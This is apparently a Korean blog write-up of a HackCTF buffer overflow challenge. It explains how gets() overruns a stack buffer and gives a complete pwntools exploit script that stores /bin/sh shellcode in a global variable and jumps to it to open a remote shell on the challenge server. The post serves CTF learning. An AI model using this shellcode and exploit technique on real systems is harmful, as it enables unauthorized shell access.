ii4gsp

HackCTF - 내 버퍼가 흘러넘친다!!! 본문

시스템 해킹/HackCTF

HackCTF - 내 버퍼가 흘러넘친다!!!

ii4gsp 2020. 2. 9. 12:33

파일을 다운받아 주자.

 

 

 

 

IDA로 열어보면 read()함수로 name에 0x32만큼 값을 넣는다.

name은 전역변수이다.

그리고 gets()함수로 변수 s에 입력을한다.

gets()함수에서 취약점이 발생한다.

s ~ sfp = 24

read함수로 name에 쉘 코드를 넣어놓고 ret를 name의 주소로하면 쉘을 획득한다.

 

 

 

 

name의 주소는 0x0804A060 이다.

 

 

 

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3003)

shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'

r.recvuntil('Name : ')
r.sendline(shellcode)

payload = ''
payload += '\x90' * 24
payload += p32(0x0804A060)

r.recvuntil('input : ')
r.sendline(payload)

r.interactive()

소스코드를 작성해주자.

 

 

 

 

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - x64 Simple_size_BOF  (0) 2020.02.09
HackCTF - x64 Buffer Overflow  (0) 2020.02.09
HackCTF - Basic_FSB  (0) 2020.02.09
HackCTF - Basic_BOF #2  (0) 2020.02.08
HackCTF - Basic_BOF #1  (0) 2020.02.08
Comments